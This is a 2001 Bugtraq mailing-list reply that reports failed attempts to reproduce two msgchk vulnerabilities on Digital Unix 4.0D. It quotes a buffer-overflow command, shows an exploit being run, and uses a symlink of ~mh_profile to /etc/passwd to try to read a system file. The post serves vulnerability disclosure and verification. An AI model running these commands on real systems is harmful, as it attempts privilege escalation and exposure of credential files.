[22622] in bugtraq
FW: Digital Unix 4.0x msgchk multiple vulnerabilities
daemon@ATHENA.MIT.EDU (Boyce, Nick)
Wed Sep 12 12:10:37 2001
Message-ID: <5F5FDD4B3580D511B3700002A57493F8046E4A@GBHBM201>
From: "Boyce, Nick" <nick.boyce@eds.com>
To: "'Bugtraq Mailing List'" <bugtraq@securityfocus.com>
Date: Wed, 12 Sep 2001 10:54:41 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
[Resend: my original reply to Bugtraq on Monday 10th has not appeared, and
I haven't seen any other followup; this time I've replaced all weird >
ASCII 127 characters in my screen dumps by X's in case that prevented my
email's handling by some MTA somewhere]
On 10 September 2001 03:54, SeungHyun Seo said :
> there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital
> unix 4.0x. it's a mail utility - check for messages (only available within
the
> message handlin system, mh)
[...]
> /usr/bin/mh/msgchk is affected to buffer overflow vulnerability
>
> -- snip --
> $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
> AAAAAAAAAAAAA ... ...
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :
> msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
> AAAAAAAAAAAAAAAAAAAAAAA
> Memory fault(coredump)
> -- snip --
NOT confirmed. On my system (Digital Unix 4.0D, Patch Kit 5) this gives me
:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAA :
msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
followed by another command prompt.
And the exploit doesn't work :
/usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std
/usr/users/joesoap/bin>msgbreak
I'm going to create the standard MH path for you.
AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
.... [lots of pairs of "G" followed by "y" with an upsilon accent]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
.... [even more A's]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX :
msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/usr/users/joesoap/bin>whoami
joesoap
/usr/users/joesoap/bin>uname -a
OSF1 mybox V4.0 878 alpha
(Lines wrapped for readability, and unprintable blobs replaced by X's.)
Looks like there must have been a patch for this somewhere in Patch Kits 1
thru 5.
Or maybe the hole only exists *prior* to 4.0D.
Part 2:
> Next , /usr/bin/mh/msgchk has a vulnerability that anyone read 1 line
> of the unprivileged file on the system it's a old bug on redhat linux
2.0,
> but it also works on digital unix 4.0x
This hole doesn't work either :
/usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile
/usr/users/joesoap>/usr/bin/mh/msgchk
joesoap :
No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST
/usr/users/joesoap>head -2 ./~mh_profile
root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:
Nick Boyce
EDS, Bristol, UK
